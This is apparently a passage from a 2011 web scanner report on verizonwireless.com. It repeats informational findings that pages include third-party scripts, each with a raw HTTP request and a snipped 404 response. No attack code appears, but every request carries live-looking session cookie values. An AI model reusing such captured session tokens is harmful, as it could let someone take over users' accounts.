Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:04 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.52. http://www.verizonwireless.com/b2c/&hec=10&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.7112846237141639 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/&hec=10&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.7112846237141639

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/&hec=10&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.7112846237141639 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:40 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.53. http://www.verizonwireless.com/b2c/&hec=11&lid=//hp//p//100+Trade+In//Imp&hid=0.3314754036255181 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/&hec=11&lid=//hp//p//100+Trade+In//Imp&hid=0.3314754036255181

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/&hec=11&lid=//hp//p//100+Trade+In//Imp&hid=0.3314754036255181 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; CP=null*; mbox=session#1315278939788-568601#1315280864|PC#1315278939788-568601.19#1316488604|check#true#1315279064; mybizCookie=true

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:44 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.54. http://www.verizonwireless.com/b2c/&hec=2&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.8891192970331758 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/&hec=2&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.8891192970331758

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/&hec=2&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.8891192970331758 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:08 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.55. http://www.verizonwireless.com/b2c/&hec=3&lid=//hp//p//Deals+Central//Imp&hid=0.5899386655073613 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/&hec=3&lid=//hp//p//Deals+Central//Imp&hid=0.5899386655073613

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/&hec=3&lid=//hp//p//Deals+Central//Imp&hid=0.5899386655073613 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:12 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.56. http://www.verizonwireless.com/b2c/&hec=4&lid=//hp//p//Back+To+School//Imp&hid=0.734757476951927 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/&hec=4&lid=//hp//p//Back+To+School//Imp&hid=0.734757476951927

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/&hec=4&lid=//hp//p//Back+To+School//Imp&hid=0.734757476951927 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:16 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.57. http://www.verizonwireless.com/b2c/&hec=5&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.5447121190372854 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/&hec=5&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.5447121190372854

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/&hec=5&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.5447121190372854 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:20 GMT
Pragma: no-cache
